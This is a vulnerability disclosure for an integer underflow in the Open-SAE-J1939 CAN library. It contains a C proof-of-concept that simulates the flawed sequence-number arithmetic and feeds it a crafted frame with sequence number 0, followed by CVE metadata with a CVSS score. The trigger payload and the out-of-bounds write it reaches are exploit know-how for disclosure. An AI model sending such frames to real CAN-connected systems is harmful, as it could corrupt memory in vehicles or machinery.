CVE-2026-37537

#include <stdio.h> #include <stdint.h> #include <stdlib.h> #define MAX_TP_DT 1785 // Simulated structure based on the vulnerability description struct TP_DT { uint8_t data[MAX_TP_DT]; }; // Function simulating the vulnerable logic void vulnerable_transport_protocol_handling(uint8_t *can_frame_data) { struct TP_DT *tp_dt = (struct TP_DT *)malloc(sizeof(struct TP_DT)); if (!tp_dt) return; // VULNERABLE LINE: Integer underflow occurs here if data[0] is 0 // uint8_t index = data[0] - 1; uint8_t index = can_frame_data[0] - 1; printf("[DEBUG] Calculated index: %d\n", index); // Simulating the loop that writes data for (int i = 1; i < 8; i++) { // Calculate offset: index * 7 + i - 1 // If index is 255 (due to underflow), offset starts at 255*7 = 1785 int offset = index * 7 + i - 1; printf("[DEBUG] Attempting write to offset: %d\n", offset); if (offset >= MAX_TP_DT) { printf("[!!!] OUT-OF-BOUNDS WRITE DETECTED at offset %d (Buffer size: %d)!\n", offset, MAX_TP_DT); // In a real scenario, this corrupts memory } else { tp_dt->data[offset] = can_frame_data[i]; } } free(tp_dt); } int main() { // Malicious CAN frame payload // data[0] is the sequence number. Setting it to 0 triggers the underflow. uint8_t malicious_frame[8] = {0x00, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47}; printf("--- CVE-2026-37537 PoC Trigger ---\n"); printf("Sending frame with sequence number 0...\n"); vulnerable_transport_protocol_handling(malicious_frame); printf("--- Exploit Attempt Finished ---\n"); return 0; }

{"cve": {"id": "CVE-2026-37537", "sourceIdentifier": "[email protected]", "published": "2026-05-01T17:16:23.550", "lastModified": "2026-05-07T15:53:49.717", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "collin80/Open-SAE-J1939 thru commit 744024d4306bc387857dfce439558336806acb06 (2023-03-08) contains an integer underflow leading to out-of-bounds write in Transport Protocol Data Transfer handling. At line 23: uint8_t index = data[0] - 1. When data[0] (sequence number from CAN frame) is 0, index underflows to 255. Subsequent write at tp_dt->data[255*7 + i-1] reaches offset 1791, exceeding the MAX_TP_DT buffer (1785 bytes) by 6 bytes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381", "source": "[email protected]"}, {"url": "https://github.com/DanielMartensson/Open-SAE-J1939", "source": "[email protected]"}, {"url": "https://github.com/collin80/Open-SAE-J1939", "source": "[email protected]"}]}}